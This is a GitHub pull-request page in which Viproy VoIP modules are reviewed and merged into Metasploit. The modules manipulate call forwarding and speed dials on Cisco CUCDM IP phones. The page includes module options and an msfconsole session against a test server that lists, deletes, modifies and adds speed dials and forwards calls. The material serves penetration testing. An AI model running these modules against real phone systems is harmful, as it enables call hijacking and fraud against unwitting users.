Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits #4065

Merged
merged 4 commits into from
Jan 10, 2015
Merged

Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits #4065

merged 4 commits into from
Jan 10, 2015

Conversation

fozavci
Copy link
Contributor

@fozavci fozavci commented Oct 24, 2014

Viproy VoIP Pen-Test Kit CUCDM exploitation modules for the call forwarding and speed dial manipulation attacks.

Sample usage and packet captures are available at the following link.
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md

Usage video and demonstration are available at the following video.
https://www.youtube.com/watch?v=6lUFMXfBw94

jvazquez-r7
jvazquez-r7 reviewed Oct 27, 2014
View reviewed changes
modules/auxiliary/voip/viproy_cucdm_callforward.rb
def initialize(info = {})
super(
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
'Version' => '1',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This field isn't used by the framework, please, delete it.

@jvazquez-r7
Copy link
Contributor

Please, do one pull request by module. It allows to handle easier and faster (no need to wait until all the modules are ready, modules can be landed once they are okey).

jvazquez-r7
jvazquez-r7 reviewed Oct 27, 2014
View reviewed changes
modules/auxiliary/voip/viproy_cucdm_callforward.rb
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
OptString.new('ACTION', [ true, 'Call forwarding action (FORWARD,INFO)', 'FORWARD']),
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please, use Actions for this purpose, not a datastore ACTION. You can review Msf::Module::HasActions for the internals. If you just interested about how to use them, there are examples in the framework. For example modules/auxiliary/admin/http/axigen_file_access, modules/auxiliary/admin/http/mutiny_frontend_read_delete,... You can search auxiliary modules with 'Actions' metadata field for examples!

@fozavci
Copy link
Contributor Author

fozavci commented Oct 28, 2014

I have fixed the findings, would you check them again please. Also I will use separated pull requests for the future ones, thanks.

@jhart-r7 jhart-r7 mentioned this pull request Oct 29, 2014
Closed
@fozavci
Copy link
Contributor Author

fozavci commented Nov 4, 2014

these exploits do not require Skinny or SIP libraries. please check the new version again, and commit your code modification suggestions, and then I can merge them.
you can test them on my fake service in the description.

@fozavci
Viproy is removed from names
d91ffa8 
Author sections are fixed
@fozavci
Copy link
Contributor Author

fozavci commented Nov 12, 2014

Is there any progress about this module? It seems ok and a test server was provided as well.

@jvazquez-r7 jvazquez-r7 self-assigned this Jan 10, 2015
@jvazquez-r7 jvazquez-r7 merged commit d91ffa8 into rapid7:master Jan 10, 2015
jvazquez-r7 added a commit that referenced this pull request Jan 10, 2015
@jvazquez-r7
Test landing #4065 into up to date branch
f7af0d9
jvazquez-r7 added a commit that referenced this pull request Jan 10, 2015
@jvazquez-r7
Land #4065, @fozavci's Cisco CUCDM auxiliary modules
49f04fa
@jvazquez-r7
Copy link
Contributor

Did final result by myself, check final result here: 49f04fa

Modules would benefit of some extra clenaup but I think the version landed is good enough to go.

Thanks @fozavci , used your test server code for testing, was really helpful.

msf auxiliary(cisco_cucdm_speed_dials) > set action List
action => List
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Getting Speed Dials of the IP phone
[+] 172.16.158.133:8080 - Position: 1, Name: jane, Telephone: 9823
[+] 172.16.158.133:8080 - Position: 2, Name: john, Telephone: 123
[+] 172.16.158.133:8080 - Position: 3, Name: viproy, Telephone: 007
[+] 172.16.158.133:8080 - Position: 4, Name: joe, Telephone: 2142
[+] 172.16.158.133:8080 - Position: 29, Name: viproxyyyy, Telephone: 007
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > set action Delete
action => Delete
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Deleting Speed Dial of the IP phone
[+] 172.16.158.133:8080 - Speed Dial 3 is deleted successfully
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > set Action Modify
Action => Modify
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Deleting Speed Dial of the IP phone
[+] 172.16.158.133:8080 - Speed Dial 3 is deleted successfully
[*] 172.16.158.133:8080 - Adding Speed Dial to the IP phone
[+] 172.16.158.133:8080 - Speed Dial 3 is added successfully
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > set Action Add
Action => Add
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Adding Speed Dial to the IP phone
[-] 172.16.158.133:8080 - Speed Dial is exist, change the position or choose modify!
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > show options

Module options (auxiliary/voip/cisco_cucdm_speed_dials):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MAC        001795A603C2     yes       MAC Address of target phone
   NAME       viproy           no        Name for Speed Dial
   POSITION   3                no        Position for Speed Dial
   Proxies                     no        Use a proxy chain
   RHOST      172.16.158.133   yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /bvsmweb         yes       Target URI for XML services
   TELNO      007              no        Phone number for Speed Dial
   VHOST                       no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   Add   Adding a speeddial for the MAC address


msf auxiliary(cisco_cucdm_speed_dials) > set POSITION 33
POSITION => 33
msf auxiliary(cisco_cucdm_speed_dials) > run

[*] 172.16.158.133:8080 - Adding Speed Dial to the IP phone
[+] 172.16.158.133:8080 - Speed Dial 33 is added successfully
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_speed_dials) > exit -y

msf auxiliary(cisco_cucdm_callforward) > set FINTNUMBER 123
FINTNUMBER => 123
msf auxiliary(cisco_cucdm_callforward) > run

[*] 172.16.158.133:8080 - Sending call forward request for 123
[+] 172.16.158.133:8080 - Call forwarded successfully for 123
[*] Auxiliary module execution completed
msf auxiliary(cisco_cucdm_callforward) > exit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jvazquez-r7 jvazquez-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@fozavci @jvazquez-r7 @todb-r7